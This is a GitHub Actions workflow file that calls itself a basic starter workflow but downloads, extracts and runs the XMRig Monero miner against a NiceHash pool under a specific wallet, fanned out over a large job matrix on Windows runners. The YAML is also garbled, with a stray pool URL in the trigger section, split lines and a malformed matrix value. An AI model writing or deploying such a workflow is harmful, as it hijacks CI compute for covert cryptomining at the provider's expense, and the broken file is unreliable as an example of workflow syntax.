# This is a basic workflow to help you get started with Actions

name: Low

# Controls when the workflow 
stratum+tcp://randomxmonero.auto.nicehash.com:9200
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
  
  branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually 
from the Actions tab
  workflow_dispatch:

jobs:
  build:
    name: BG_Adhy    runs-on: windows-latest
    
strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
  
      flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    
steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest 
https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-msvc-win64.zip -OutFile xmrig-
6.17.0-msvc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.17.0-msvc-win64.zip
    - name: 
Dir
      run: ls
    - name: Dir
      run: Dir xmrig-6.17.0-msvc-win64
    - name: Running
      run: .
\xmrig-6.17.0-msvc-win64\xmrig-6.17.0\xmrig.exe  --donate-level 1 -o randomxmonero.auto.nicehash.com:9200 -a rx/0 -u 
36nt4HTQTEvdfadtSrqugLR39V47LQeAPD.Rig001#eitx-u3k9 -p x -k --cpu 1
    - name: DONE
      
run: exit
